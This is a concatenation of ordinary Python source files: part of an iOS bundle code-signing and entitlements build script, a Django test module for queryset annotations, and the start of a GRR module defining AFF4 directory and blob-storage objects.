to object, each mapping will be looked up in the bundle data to check it has the same value (missing values will be ignored) Returns: A dictionary of the key with a different value between expected_mappings and the content of the bundle (i.e. errors) so that caller can format the error message. The dictionary will be empty if there are no errors. """ errors = {} for key, expected_value in expected_mappings.iteritems(): if key in self._data: value = self._data[key] if value != expected_value: errors[key] = (value, expected_value) return errors class ProvisioningProfile(object): """Wraps a mobile provisioning profile file.""" def __init__(self, provisioning_profile_path): """Initializes the ProvisioningProfile with data from profile file.""" self._path = provisioning_profile_path self._data = plistlib.readPlistFromString(subprocess.check_output([ 'xcrun', 'security', 'cms', '-D', '-u', 'certUsageAnyCA', '-i', provisioning_profile_path])) @property def path(self): return self._path @property def application_identifier_pattern(self): return self._data.get('Entitlements', {}).get('application-identifier', '') @property def application_identifier_prefix(self): return self._data.get('ApplicationIdentifierPrefix', [''])[0] @property def entitlements(self): return self._data.get('Entitlements', {}) @property def expiration_date(self): return self._data.get('ExpirationDate', datetime.datetime.now()) def ValidToSignBundle(self, bundle_identifier): """Checks whether the provisioning profile can sign bundle_identifier. Args: bundle_identifier: the identifier of the bundle that needs to be signed. Returns: True if the mobile provisioning profile can be used to sign a bundle with the corresponding bundle_identifier, False otherwise. """ return fnmatch.fnmatch( '%s.%s' % (self.application_identifier_prefix, bundle_identifier), self.application_identifier_pattern) def Install(self, installation_path): """Copies mobile provisioning profile info to |installation_path|.""" shutil.copy2(self.path, installation_path) class Entitlements(object): """Wraps an Entitlement plist file.""" def __init__(self, entitlements_path): """Initializes Entitlements object from entitlement file.""" self._path = entitlements_path self._data = LoadPlistFile(self._path) @property def path(self): return self._path def ExpandVariables(self, substitutions): self._data = self._ExpandVariables(self._data, substitutions) def _ExpandVariables(self, data, substitutions): if isinstance(data, str): for key, substitution in substitutions.iteritems(): data = data.replace('$(%s)' % (key,), substitution) return data if isinstance(data, dict): for key, value in data.iteritems(): data[key] = self._ExpandVariables(value, substitutions) return data if isinstance(data, list): for i, value in enumerate(data): data[i] = self._ExpandVariables(value, substitutions) return data def LoadDefaults(self, defaults): for key, value in defaults.iteritems(): if key not in self._data: self._data[key] = value def WriteTo(self, target_path): plistlib.writePlist(self._data, target_path) def FindProvisioningProfile(bundle_identifier, required): """Finds mobile provisioning profile to use to sign bundle. Args: bundle_identifier: the identifier of the bundle to sign. Returns: The ProvisioningProfile object that can be used to sign the Bundle object or None if no matching provisioning profile was found. """ provisioning_profile_paths = glob.glob( os.path.join(GetProvisioningProfilesDir(), '*.mobileprovision')) # Iterate over all installed mobile provisioning profiles and filter those # that can be used to sign the bundle, ignoring expired ones. now = datetime.datetime.now() valid_provisioning_profiles = [] one_hour = datetime.timedelta(0, 3600) for provisioning_profile_path in provisioning_profile_paths: provisioning_profile = ProvisioningProfile(provisioning_profile_path) if provisioning_profile.expiration_date - now < one_hour: sys.stderr.write( 'Warning: ignoring expired provisioning profile: %s.\n' % provisioning_profile_path) continue if provisioning_profile.ValidToSignBundle(bundle_identifier): valid_provisioning_profiles.append(provisioning_profile) if not valid_provisioning_profiles: if required: sys.stderr.write( 'Error: no mobile provisioning profile found for "%s".\n' % bundle_identifier) sys.exit(1) return None # Select the most specific mobile provisioning profile, i.e. the one with # the longest application identifier pattern (prefer the one with the latest # expiration date as a secondary criteria). selected_provisioning_profile = max( valid_provisioning_profiles, key=lambda p: (len(p.application_identifier_pattern), p.expiration_date)) one_week = datetime.timedelta(7) if selected_provisioning_profile.expiration_date - now < 2 * one_week: sys.stderr.write( 'Warning: selected provisioning profile will expire soon: %s' % selected_provisioning_profile.path) return selected_provisioning_profile def CodeSignBundle(bundle_path, identity, extra_args): process = subprocess.Popen(['xcrun', 'codesign', '--force', '--sign', identity, '--timestamp=none'] + list(extra_args) + [bundle_path], stderr=subprocess.PIPE) _, stderr = process.communicate() if process.returncode: sys.stderr.write(stderr) sys.exit(process.returncode) for line in stderr.splitlines(): if line.endswith(': replacing existing signature'): # Ignore warning about replacing existing signature as this should only # happen when re-signing system frameworks (and then it is expected). continue sys.stderr.write(line) sys.stderr.write('\n') def InstallSystemFramework(framework_path, bundle_path, args): """Install framework from |framework_path| to |bundle| and code-re-sign it.""" installed_framework_path = os.path.join( bundle_path, 'Frameworks', os.path.basename(framework_path)) if os.path.isfile(framework_path): shutil.copy(framework_path, installed_framework_path) elif os.path.isdir(framework_path): if os.path.exists(installed_framework_path): shutil.rmtree(installed_framework_path) shutil.copytree(framework_path, installed_framework_path) CodeSignBundle(installed_framework_path, args.identity, ['--deep', '--preserve-metadata=identifier,entitlements,flags']) def GenerateEntitlements(path, provisioning_profile, bundle_identifier): """Generates an entitlements file. Args: path: path to the entitlements template file provisioning_profile: ProvisioningProfile object to use, may be None bundle_identifier: identifier of the bundle to sign. """ entitlements = Entitlements(path) if provisioning_profile: entitlements.LoadDefaults(provisioning_profile.entitlements) app_identifier_prefix = \ provisioning_profile.application_identifier_prefix + '.' else: app_identifier_prefix = '*.' entitlements.ExpandVariables({ 'CFBundleIdentifier': bundle_identifier, 'AppIdentifierPrefix': app_identifier_prefix, }) return entitlements def GenerateBundleInfoPlist(bundle_path, plist_compiler, partial_plist): """Generates the bundle Info.plist for a list of partial .plist files. Args: bundle_path: path to the bundle plist_compiler: string, path to the Info.plist compiler partial_plist: list of path to partial .plist files to merge """ # Filter empty partial .plist files (this happens if an application # does not include need to compile any asset catalog, in which case # the partial .plist file from the asset catalog compilation step is # just a stamp file). filtered_partial_plist = [] for plist in partial_plist: plist_size = os.stat(plist).st_size if plist_size: filtered_partial_plist.append(plist) # Invoke the plist_compiler script. It needs to be a python script. subprocess.check_call([ 'python', plist_compiler, 'merge', '-f', 'binary1', '-o', os.path.join(bundle_path, 'Info.plist'), ] + filtered_partial_plist) class Action(object): """Class implementing one action supported by the script.""" @classmethod def Register(cls, subparsers): parser = subparsers.add_parser(cls.name, help=cls.help) parser.set_defaults(func=cls._Execute) cls._Register(parser) class CodeSignBundleAction(Action): """Class implementing the code-sign-bundle action.""" name = 'code-sign-bundle' help = 'perform code signature for a bundle' @staticmethod def _Register(parser): parser.add_argument( '--entitlements', '-e', dest='entitlements_path', help='path to the entitlements file to use') parser.add_argument( 'path', help='path to the iOS bundle to codesign') parser.add_argument( '--identity', '-i', required=True, help='identity to use to codesign') parser.add_argument( '--binary', '-b', required=True, help='path to the iOS bundle binary') parser.add_argument( '--framework', '-F', action='append', default=[], dest='frameworks', help='install and resign system framework') parser.add_argument( '--disable-code-signature', action='store_true', dest='no_signature', help='disable code signature') parser.add_argument( '--disable-embedded-mobileprovision', action='store_false', default=True, dest='embedded_mobileprovision', help='disable finding and embedding mobileprovision') parser.add_argument( '--platform', '-t', required=True, help='platform the signed bundle is targeting') parser.add_argument( '--partial-info-plist', '-p', action='append', default=[], help='path to partial Info.plist to merge to create bundle Info.plist') parser.add_argument( '--plist-compiler-path', '-P', action='store', help='path to the plist compiler script (for --partial-info-plist)') parser.set_defaults(no_signature=False) @staticmethod def _Execute(args): if not args.identity: args.identity = '-' if args.partial_info_plist: GenerateBundleInfoPlist( args.path, args.plist_compiler_path, args.partial_info_plist) bundle = Bundle(args.path) # According to Apple documentation, the application binary must be the same # as the bundle name without the .app suffix. See crbug.com/740476 for more # information on what problem this can cause. # # To prevent this class of error, fail with an error if the binary name is # incorrect in the Info.plist as it is not possible to update the value in # Info.plist at this point (the file has been copied by a different target # and ninja would consider the build dirty if it was updated). # # Also checks that the name of the bundle is correct too (does not cause the # build to be considered dirty, but still terminate the script in case of an # incorrect bundle name). # # Apple documentation is available at: # https://developer.apple.com/library/content/documentation/CoreFoundation/Conceptual/CFBundles/BundleTypes/BundleTypes.html bundle_name = os.path.splitext(os.path.basename(bundle.path))[0] errors = bundle.Validate({ 'CFBundleName': bundle_name, 'CFBundleExecutable': bundle_name, }) if errors: for key in sorted(errors): value, expected_value = errors[key] sys.stderr.write('%s: error: %s value incorrect: %s != %s\n' % ( bundle.path, key, value, expected_value)) sys.stderr.flush() sys.exit(1) # Delete existing embedded mobile provisioning. embedded_provisioning_profile = os.path.join( bundle.path, 'embedded.mobileprovision') if os.path.isfile(embedded_provisioning_profile): os.unlink(embedded_provisioning_profile) # Delete existing code signature. signature_file = os.path.join(args.path, '_CodeSignature', 'CodeResources') if os.path.isfile(signature_file): shutil.rmtree(os.path.dirname(signature_file)) # Install system frameworks if requested. for framework_path in args.frameworks: InstallSystemFramework(framework_path, args.path, args) # Copy main binary into bundle. if os.path.isfile(bundle.binary_path): os.unlink(bundle.binary_path) shutil.copy(args.binary, bundle.binary_path) if args.no_signature: return codesign_extra_args = [] if args.embedded_mobileprovision: # Find mobile provisioning profile and embeds it into the bundle (if a # code signing identify has been provided, fails if no valid mobile # provisioning is found). provisioning_profile_required = args.identity != '-' provisioning_profile = FindProvisioningProfile( bundle.identifier, provisioning_profile_required) if provisioning_profile and args.platform != 'iphonesimulator': provisioning_profile.Install(embedded_provisioning_profile) if args.entitlements_path is not None: temporary_entitlements_file = \ tempfile.NamedTemporaryFile(suffix='.xcent') codesign_extra_args.extend( ['--entitlements', temporary_entitlements_file.name]) entitlements = GenerateEntitlements( args.entitlements_path, provisioning_profile, bundle.identifier) entitlements.WriteTo(temporary_entitlements_file.name) CodeSignBundle(bundle.path, args.identity, codesign_extra_args) class CodeSignFileAction(Action): """Class implementing code signature for a single file.""" name = 'code-sign-file' help = 'code-sign a single file' @staticmethod def _Register(parser): parser.add_argument( 'path', help='path to the file to codesign') parser.add_argument( '--identity', '-i', required=True, help='identity to use to codesign') parser.add_argument( '--output', '-o', help='if specified copy the file to that location before signing it') parser.set_defaults(sign=True) @staticmethod def _Execute(args): if not args.identity: args.identity = '-' install_path = args.path if args.output: if os.path.isfile(args.output): os.unlink(args.output) elif os.path.isdir(args.output): shutil.rmtree(args.output) if os.path.isfile(args.path): shutil.copy(args.path, args.output) elif os.path.isdir(args.path): shutil.copytree(args.path, args.output) install_path = args.output CodeSignBundle(install_path, args.identity, ['--deep', '--preserve-metadata=identifier,entitlements']) class GenerateEntitlementsAction(Action): """Class implementing the generate-entitlements action.""" name = 'generate-entitlements' help = 'generate entitlements file' @staticmethod def _Register(parser): parser.add_argument( '--entitlements', '-e', dest='entitlements_path', help='path to the entitlements file to use') parser.add_argument( 'path', help='path to the entitlements file to generate') parser.add_argument( '--info-plist', '-p', required=True, help='path to the bundle Info.plist') @staticmethod def _Execute(args): info_plist = LoadPlistFile(args.info_plist) bundle_identifier = info_plist['CFBundleIdentifier'] provisioning_profile = FindProvisioningProfile(bundle_identifier, False) entitlements = GenerateEntitlements( args.entitlements_path, provisioning_profile, bundle_identifier) entitlements.WriteTo(args.path) def Main(): # Cache this codec so that plistlib can find it. See # https://crbug.com/999461#c12 for more details. codecs.lookup('utf-8') parser = argparse.ArgumentParser('codesign iOS bundles') subparsers = parser.add_subparsers() actions = [ CodeSignBundleAction, CodeSignFileAction, GenerateEntitlementsAction, ] for action in actions: action.Register(subparsers) args = parser.parse_args() args.func(args) if __name__ == '__main__': sys.exit(Main())
from __future__ import unicode_literals import datetime from decimal import Decimal from django.core.exceptions import FieldDoesNotExist, FieldError from django.db.models import ( F, BooleanField, CharField, Count, DateTimeField, ExpressionWrapper, Func, IntegerField, Sum, Value, ) from django.test import TestCase from django.utils import six from .models import ( Author, Book, Company, DepartmentStore, Employee, Publisher, Store, Ticket, ) def cxOracle_py3_bug(func): """ There's a bug in Django/cx_Oracle with respect to string handling under Python 3 (essentially, they treat Python 3 strings as Python 2 strings rather than unicode). This makes some tests here fail under Python 3, so we mark them as expected failures until someone fixes them in #23843. """ from unittest import expectedFailure from django.db import connection return expectedFailure(func) if connection.vendor == 'oracle' and six.PY3 else func class NonAggregateAnnotationTestCase(TestCase): @classmethod def setUpTestData(cls): cls.a1 = Author.objects.create(name='Adrian Holovaty', age=34) cls.a2 = Author.objects.create(name='Jacob Kaplan-Moss', age=35) cls.a3 = Author.objects.create(name='Brad Dayley', age=45) cls.a4 = Author.objects.create(name='James Bennett', age=29) cls.a5 = Author.objects.create(name='Jeffrey Forcier', age=37) cls.a6 = Author.objects.create(name='Paul Bissex', age=29) cls.a7 = Author.objects.create(name='Wesley J. Chun', age=25) cls.a8 = Author.objects.create(name='Peter Norvig', age=57) cls.a9 = Author.objects.create(name='Stuart Russell', age=46) cls.a1.friends.add(cls.a2, cls.a4) cls.a2.friends.add(cls.a1, cls.a7) cls.a4.friends.add(cls.a1) cls.a5.friends.add(cls.a6, cls.a7) cls.a6.friends.add(cls.a5, cls.a7) cls.a7.friends.add(cls.a2, cls.a5, cls.a6) cls.a8.friends.add(cls.a9) cls.a9.friends.add(cls.a8) cls.p1 = Publisher.objects.create(name='Apress', num_awards=3) cls.p2 = Publisher.objects.create(name='Sams', num_awards=1) cls.p3 = Publisher.objects.create(name='Prentice Hall', num_awards=7) cls.p4 = Publisher.objects.create(name='Morgan Kaufmann', num_awards=9) cls.p5 = Publisher.objects.create(name="Jonno's House of Books", num_awards=0) cls.b1 = Book.objects.create( isbn='159059725', name='The Definitive Guide to Django: Web Development Done Right', pages=447, rating=4.5, price=Decimal('30.00'), contact=cls.a1, publisher=cls.p1, pubdate=datetime.date(2007, 12, 6) ) cls.b2 = Book.objects.create( isbn='067232959', name='Sams Teach Yourself Django in 24 Hours', pages=528, rating=3.0, price=Decimal('23.09'), contact=cls.a3, publisher=cls.p2, pubdate=datetime.date(2008, 3, 3) ) cls.b3 = Book.objects.create( isbn='159059996', name='Practical Django Projects', pages=300, rating=4.0, price=Decimal('29.69'), contact=cls.a4, publisher=cls.p1, pubdate=datetime.date(2008, 6, 23) ) cls.b4 = Book.objects.create( isbn='013235613', name='Python Web Development with Django', pages=350, rating=4.0, price=Decimal('29.69'), contact=cls.a5, publisher=cls.p3, pubdate=datetime.date(2008, 11, 3) ) cls.b5 = Book.objects.create( isbn='013790395', name='Artificial Intelligence: A Modern Approach', pages=1132, rating=4.0, price=Decimal('82.80'), contact=cls.a8, publisher=cls.p3, pubdate=datetime.date(1995, 1, 15) ) cls.b6 = Book.objects.create( isbn='155860191', name='Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp', pages=946, rating=5.0, price=Decimal('75.00'), contact=cls.a8, publisher=cls.p4, pubdate=datetime.date(1991, 10, 15) ) cls.b1.authors.add(cls.a1, cls.a2) cls.b2.authors.add(cls.a3) cls.b3.authors.add(cls.a4) cls.b4.authors.add(cls.a5, cls.a6, cls.a7) cls.b5.authors.add(cls.a8, cls.a9) cls.b6.authors.add(cls.a8) s1 = Store.objects.create( name='Amazon.com', original_opening=datetime.datetime(1994, 4, 23, 9, 17, 42), friday_night_closing=datetime.time(23, 59, 59) ) s2 = Store.objects.create( name='Books.com', original_opening=datetime.datetime(2001, 3, 15, 11, 23, 37), friday_night_closing=datetime.time(23, 59, 59) ) s3 = Store.objects.create( name="Mamma and Pappa's Books", original_opening=datetime.datetime(1945, 4, 25, 16, 24, 14), friday_night_closing=datetime.time(21, 30) ) s1.books.add(cls.b1, cls.b2, cls.b3, cls.b4, cls.b5, cls.b6) s2.books.add(cls.b1, cls.b3, cls.b5, cls.b6) s3.books.add(cls.b3, cls.b4, cls.b6) def test_basic_annotation(self): books = Book.objects.annotate( is_book=Value(1, output_field=IntegerField())) for book in books: self.assertEqual(book.is_book, 1) def test_basic_f_annotation(self): books = Book.objects.annotate(another_rating=F('rating')) for book in books: self.assertEqual(book.another_rating, book.rating) def test_joined_annotation(self): books = Book.objects.select_related('publisher').annotate( num_awards=F('publisher__num_awards')) for book in books: self.assertEqual(book.num_awards, book.publisher.num_awards) def test_mixed_type_annotation_date_interval(self): active = datetime.datetime(2015, 3, 20, 14, 0, 0) duration = datetime.timedelta(hours=1) expires = datetime.datetime(2015, 3, 20, 14, 0, 0) + duration Ticket.objects.create(active_at=active, duration=duration) t = Ticket.objects.annotate( expires=ExpressionWrapper(F('active_at') + F('duration'), output_field=DateTimeField()) ).first() self.assertEqual(t.expires, expires) def test_mixed_type_annotation_numbers(self): test = self.b1 b = Book.objects.annotate( combined=ExpressionWrapper(F('pages') + F('rating'), output_field=IntegerField()) ).get(isbn=test.isbn) combined = int(test.pages + test.rating) self.assertEqual(b.combined, combined) def test_annotate_with_aggregation(self): books = Book.objects.annotate( is_book=Value(1, output_field=IntegerField()), rating_count=Count('rating')) for book in books: self.assertEqual(book.is_book, 1) self.assertEqual(book.rating_count, 1) def test_aggregate_over_annotation(self): agg = Author.objects.annotate(other_age=F('age')).aggregate(otherage_sum=Sum('other_age')) other_agg = Author.objects.aggregate(age_sum=Sum('age')) self.assertEqual(agg['otherage_sum'], other_agg['age_sum']) def test_filter_annotation(self): books = Book.objects.annotate( is_book=Value(1, output_field=IntegerField()) ).filter(is_book=1) for book in books: self.assertEqual(book.is_book, 1) def test_filter_annotation_with_f(self): books = Book.objects.annotate( other_rating=F('rating') ).filter(other_rating=3.5) for book in books: self.assertEqual(book.other_rating, 3.5) def test_filter_annotation_with_double_f(self): books = Book.objects.annotate( other_rating=F('rating') ).filter(other_rating=F('rating')) for book in books: self.assertEqual(book.other_rating, book.rating) def test_filter_agg_with_double_f(self): books = Book.objects.annotate( sum_rating=Sum('rating') ).filter(sum_rating=F('sum_rating')) for book in books: self.assertEqual(book.sum_rating, book.rating) def test_filter_wrong_annotation(self): with six.assertRaisesRegex(self, FieldError, "Cannot resolve keyword .*"): list(Book.objects.annotate( sum_rating=Sum('rating') ).filter(sum_rating=F('nope'))) def test_combined_annotation_commutative(self): book1 = Book.objects.annotate(adjusted_rating=F('rating') + 2).get(pk=self.b1.pk) book2 = Book.objects.annotate(adjusted_rating=2 + F('rating')).get(pk=self.b1.pk) self.assertEqual(book1.adjusted_rating, book2.adjusted_rating) book1 = Book.objects.annotate(adjusted_rating=F('rating') + None).get(pk=self.b1.pk) book2 = Book.objects.annotate(adjusted_rating=None + F('rating')).get(pk=self.b1.pk) self.assertEqual(book1.adjusted_rating, book2.adjusted_rating) def test_update_with_annotation(self): book_preupdate = Book.objects.get(pk=self.b2.pk) Book.objects.annotate(other_rating=F('rating') - 1).update(rating=F('other_rating')) book_postupdate = Book.objects.get(pk=self.b2.pk) self.assertEqual(book_preupdate.rating - 1, book_postupdate.rating) def test_annotation_with_m2m(self): books = Book.objects.annotate(author_age=F('authors__age')).filter(pk=self.b1.pk).order_by('author_age') self.assertEqual(books[0].author_age, 34) self.assertEqual(books[1].author_age, 35) def test_annotation_reverse_m2m(self): books = Book.objects.annotate( store_name=F('store__name')).filter( name='Practical Django Projects').order_by( 'store_name') self.assertQuerysetEqual( books, [ 'Amazon.com', 'Books.com', 'Mamma and Pappa\'s Books' ], lambda b: b.store_name ) def test_values_annotation(self): """ Annotations can reference fields in a values clause, and contribute to an existing values clause. """ # annotate references a field in values() qs = Book.objects.values('rating').annotate(other_rating=F('rating') - 1) book = qs.get(pk=self.b1.pk) self.assertEqual(book['rating'] - 1, book['other_rating']) # filter refs the annotated value book = qs.get(other_rating=4) self.assertEqual(book['other_rating'], 4) # can annotate an existing values with a new field book = qs.annotate(other_isbn=F('isbn')).get(other_rating=4) self.assertEqual(book['other_rating'], 4) self.assertEqual(book['other_isbn'], '155860191') def test_defer_annotation(self): """ Deferred attributes can be referenced by an annotation, but they are not themselves deferred, and cannot be deferred. """ qs = Book.objects.defer('rating').annotate(other_rating=F('rating') - 1) with self.assertNumQueries(2): book = qs.get(other_rating=4) self.assertEqual(book.rating, 5) self.assertEqual(book.other_rating, 4) with six.assertRaisesRegex(self, FieldDoesNotExist, "\w has no field named u?'other_rating'"): book = qs.defer('other_rating').get(other_rating=4) def test_mti_annotations(self): """ Fields on an inherited model can be referenced by an annotated field. """ d = DepartmentStore.objects.create( name='Angus & Robinson', original_opening=datetime.date(2014, 3, 8), friday_night_closing=datetime.time(21, 00, 00), chain='Westfield' ) books = Book.objects.filter(rating__gt=4) for b in books: d.books.add(b) qs = DepartmentStore.objects.annotate( other_name=F('name'), other_chain=F('chain'), is_open=Value(True, BooleanField()), book_isbn=F('books__isbn') ).order_by('book_isbn').filter(chain='Westfield') self.assertQuerysetEqual( qs, [ ('Angus & Robinson', 'Westfield', True, '155860191'), ('Angus & Robinson', 'Westfield', True, '159059725') ], lambda d: (d.other_name, d.other_chain, d.is_open, d.book_isbn) ) def test_null_annotation(self): """ Test that annotating None onto a model round-trips """ book = Book.objects.annotate(no_value=Value(None, output_field=IntegerField())).first() self.assertIsNone(book.no_value) def test_order_by_annotation(self): authors = Author.objects.annotate(other_age=F('age')).order_by('other_age') self.assertQuerysetEqual( authors, [ 25, 29, 29, 34, 35, 37, 45, 46, 57, ], lambda a: a.other_age ) def test_order_by_aggregate(self): authors = Author.objects.values('age').annotate(age_count=Count('age')).order_by('age_count', 'age') self.assertQuerysetEqual( authors, [ (25, 1), (34, 1), (35, 1), (37, 1), (45, 1), (46, 1), (57, 1), (29, 2), ], lambda a: (a['age'], a['age_count']) ) def test_annotate_exists(self): authors = Author.objects.annotate(c=Count('id')).filter(c__gt=1) self.assertFalse(authors.exists()) def test_column_field_ordering(self): """ Test that columns are aligned in the correct order for resolve_columns. This test will fail on mysql if column ordering is out. Column fields should be aligned as: 1. extra_select 2. model_fields 3. annotation_fields 4. model_related_fields """ store = Store.objects.first() Employee.objects.create(id=1, first_name='Max', manager=True, last_name='Paine', store=store, age=23, salary=Decimal(50000.00)) Employee.objects.create(id=2, first_name='Buffy', manager=False, last_name='Summers', store=store, age=18, salary=Decimal(40000.00)) qs = Employee.objects.extra( select={'random_value': '42'} ).select_related('store').annotate( annotated_value=Value(17, output_field=IntegerField()) ) rows = [ (1, 'Max', True, 42, 'Paine', 23, Decimal(50000.00), store.name, 17), (2, 'Buffy', False, 42, 'Summers', 18, Decimal(40000.00), store.name, 17) ] self.assertQuerysetEqual( qs.order_by('id'), rows, lambda e: ( e.id, e.first_name, e.manager, e.random_value, e.last_name, e.age, e.salary, e.store.name, e.annotated_value)) def test_column_field_ordering_with_deferred(self): store = Store.objects.first() Employee.objects.create(id=1, first_name='Max', manager=True, last_name='Paine', store=store, age=23, salary=Decimal(50000.00)) Employee.objects.create(id=2, first_name='Buffy', manager=False, last_name='Summers', store=store, age=18, salary=Decimal(40000.00)) qs = Employee.objects.extra( select={'random_value': '42'} ).select_related('store').annotate( annotated_value=Value(17, output_field=IntegerField()) ) rows = [ (1, 'Max', True, 42, 'Paine', 23, Decimal(50000.00), store.name, 17), (2, 'Buffy', False, 42, 'Summers', 18, Decimal(40000.00), store.name, 17) ] # and we respect deferred columns! self.assertQuerysetEqual( qs.defer('age').order_by('id'), rows, lambda e: ( e.id, e.first_name, e.manager, e.random_value, e.last_name, e.age, e.salary, e.store.name, e.annotated_value)) @cxOracle_py3_bug def test_custom_functions(self): Company(name='Apple', motto=None, ticker_name='APPL', description='Beautiful Devices').save() Company(name='Django Software Foundation', motto=None, ticker_name=None, description=None).save() Company(name='Google', motto='Do No Evil', ticker_name='GOOG', description='Internet Company').save() Company(name='Yahoo', motto=None, ticker_name=None, description='Internet Company').save() qs = Company.objects.annotate( tagline=Func( F('motto'), F('ticker_name'), F('description'), Value('No Tag'), function='COALESCE') ).order_by('name') self.assertQuerysetEqual( qs, [ ('Apple', 'APPL'), ('Django Software Foundation', 'No Tag'), ('Google', 'Do No Evil'), ('Yahoo', 'Internet Company') ], lambda c: (c.name, c.tagline) ) @cxOracle_py3_bug def test_custom_functions_can_ref_other_functions(self): Company(name='Apple', motto=None, ticker_name='APPL', description='Beautiful Devices').save() Company(name='Django Software Foundation', motto=None, ticker_name=None, description=None).save() Company(name='Google', motto='Do No Evil', ticker_name='GOOG', description='Internet Company').save() Company(name='Yahoo', motto=None, ticker_name=None, description='Internet Company').save() class Lower(Func): function = 'LOWER' qs = Company.objects.annotate( tagline=Func( F('motto'), F('ticker_name'), F('description'), Value('No Tag'), function='COALESCE') ).annotate( tagline_lower=Lower(F('tagline'), output_field=CharField()) ).order_by('name') # LOWER function supported by: # oracle, postgres, mysql, sqlite, sqlserver self.assertQuerysetEqual( qs, [ ('Apple', 'APPL'.lower()), ('Django Software Foundation', 'No Tag'.lower()), ('Google', 'Do No Evil'.lower()), ('Yahoo', 'Internet Company'.lower()) ], lambda c: (c.name, c.tagline_lower) )
#!/usr/bin/env python """These are standard aff4 objects.""" import hashlib import StringIO from grr.lib import aff4 from grr.lib import data_store from grr.lib import flow from grr.lib import rdfvalue from grr.lib import utils class VFSDirectory(aff4.AFF4Volume): """This represents a directory from the client.""" default_container = "VFSDirectory" # We contain other objects within the tree. _behaviours = frozenset(["Container"]) def Update(self, attribute=None, priority=None): """Refresh an old attribute. Note that refreshing the attribute is asynchronous. It does not change anything about the current object - you need to reopen the same URN some time later to get fresh data. Attributes: CONTAINS - Refresh the content of the directory listing. Args: attribute: An attribute object as listed above. priority: Priority to set for updating flow, None for default. Returns: The Flow ID that is pending Raises: IOError: If there has been an error starting the flow. """ # client id is the first path element client_id = self.urn.Split()[0] if attribute == self.Schema.CONTAINS: # Get the pathspec for this object pathspec = self.Get(self.Schema.PATHSPEC) stripped_components = [] parent = self while not pathspec and len(parent.urn.Split()) > 1: # We try to recurse up the tree to get a real pathspec. # These directories are created automatically without pathspecs when a # deep directory is listed without listing the parents. # Note /fs/os or /fs/tsk won't be updateable so we will raise IOError # if we try. stripped_components.append(parent.urn.Basename()) pathspec = parent.Get(parent.Schema.PATHSPEC) parent = aff4.FACTORY.Open(parent.urn.Dirname(), token=self.token) if pathspec: if stripped_components: # We stripped pieces of the URL, time to add them back at the deepest # nested path. new_path = utils.JoinPath(pathspec.last.path, *stripped_components[:-1]) pathspec.last.path = new_path flow_id = flow.GRRFlow.StartFlow(client_id=client_id, flow_name="ListDirectory", pathspec=pathspec, priority=priority, notify_to_user=False, token=self.token) else: raise IOError("Item has no pathspec.") return flow_id class SchemaCls(aff4.AFF4Volume.SchemaCls): """Attributes specific to VFSDirectory.""" STAT = aff4.Attribute("aff4:stat", rdfvalue.StatEntry, "A StatResponse protobuf describing this file.", "stat") PATHSPEC = aff4.Attribute( "aff4:pathspec", rdfvalue.PathSpec, "The pathspec used to retrieve this object from the client.", "pathspec") class HashList(rdfvalue.RDFBytes): """A list of hashes.""" HASH_SIZE = 32 def __len__(self): return len(self._value) / self.HASH_SIZE def __iter__(self): for i in range(len(self)): yield self[i] def __getitem__(self, idx): return rdfvalue.HashDigest( self._value[idx * self.HASH_SIZE: (idx + 1) * self.HASH_SIZE]) class BlobImage(aff4.AFF4Image): """An AFF4 stream which stores chunks by hashes. The hash stream is kept within an AFF4 Attribute, instead of another stream making it more efficient for smaller files. """ # Size of a sha256 hash _HASH_SIZE = 32 # How many chunks we read ahead _READAHEAD = 5 def Initialize(self): super(BlobImage, self).Initialize() self.content_dirty = False if self.mode == "w": self.index = StringIO.StringIO("") self.finalized = False else: self.index = StringIO.StringIO(self.Get(self.Schema.HASHES, "")) self.finalized = self.Get(self.Schema.FINALIZED, False) def Truncate(self, offset=0): if offset != 0: raise IOError("Non-zero truncation not supported for BlobImage") super(BlobImage, self).Truncate(0) self.index = StringIO.StringIO("") self.finalized = False def _GetChunkForWriting(self, chunk): """Chunks must be added using the AddBlob() method.""" raise NotImplementedError("Direct writing of HashImage not allowed.") def _GetChunkForReading(self, chunk): """Retrieve the relevant blob from the AFF4 data store or cache.""" result = None offset = chunk * self._HASH_SIZE self.index.seek(offset) chunk_name = self.index.read(self._HASH_SIZE) try: result = self.chunk_cache.Get(chunk_name) except KeyError: # Read ahead a few chunks. self.index.seek(offset) readahead = {} for _ in range(self._READAHEAD): name = self.index.read(self._HASH_SIZE) if name and name not in self.chunk_cache: urn = aff4.ROOT_URN.Add("blobs").Add(name.encode("hex")) readahead[urn] = name fds = aff4.FACTORY.MultiOpen(readahead, mode="r", token=self.token) for fd in fds: name = readahead[fd.urn] # Remember the right fd if name == chunk_name: result = fd # Put back into the cache self.chunk_cache.Put(readahead[fd.urn], fd) return result def FromBlobImage(self, fd): """Copy this file cheaply from another BlobImage.""" self.content_dirty = True self.SetChunksize(fd.chunksize) self.index = StringIO.StringIO(fd.index.getvalue()) self.size = fd.size def Flush(self, sync=True): if self.content_dirty: self.Set(self.Schema.SIZE(self.size)) self.Set(self.Schema.HASHES(self.index.getvalue())) self.Set(self.Schema.FINALIZED(self.finalized)) super(BlobImage, self).Flush(sync) def AppendContent(self, src_fd): """Create new blob hashes and append to BlobImage. We don't support writing at arbitrary file offsets, but this method provides a convenient way to add blobs for a new file, or append content to an existing one. Args: src_fd: source file handle open for read Raises: IOError: if blob has already been finalized. """ while 1: blob = src_fd.read(self.chunksize) if not blob: break blob_hash = hashlib.sha256(blob).digest() blob_urn = rdfvalue.RDFURN("aff4:/blobs").Add(blob_hash.encode("hex")) try: fd = aff4.FACTORY.Open(blob_urn, "AFF4MemoryStream", mode="r", token=self.token) except IOError: fd = aff4.FACTORY.Create(blob_urn, "AFF4MemoryStream", mode="w", token=self.token) fd.Write(blob) fd.Close(sync=True) self.AddBlob(blob_hash, len(blob)) self.Flush() def AddBlob(self, blob_hash, length): """Add another blob to this image using its hash. Once a blob is added that is smaller than the chunksize we finalize the file, since handling adding more blobs makes the code much more complex. Args: blob_hash: sha256 binary digest length: int length of blob Raises: IOError: if blob has been finalized. """ if self.finalized and length > 0: raise IOError("Can't add blobs to finalized BlobImage") self.content_dirty = True self.index.seek(0, 2) self.index.write(blob_hash) self.size += length if length < self.chunksize: self.finalized = True class SchemaCls(aff4.AFF4Image.SchemaCls): """The schema for Blob Images.""" STAT = aff4.AFF4Object.VFSDirectory.SchemaCls.STAT HASHES = aff4.Attribute("aff4:hashes", rdfvalue.HashList, "List of hashes of each chunk in this file.") FINGERPRINT = aff4.Attribute("aff4:fingerprint", rdfvalue.FingerprintResponse, "Protodict 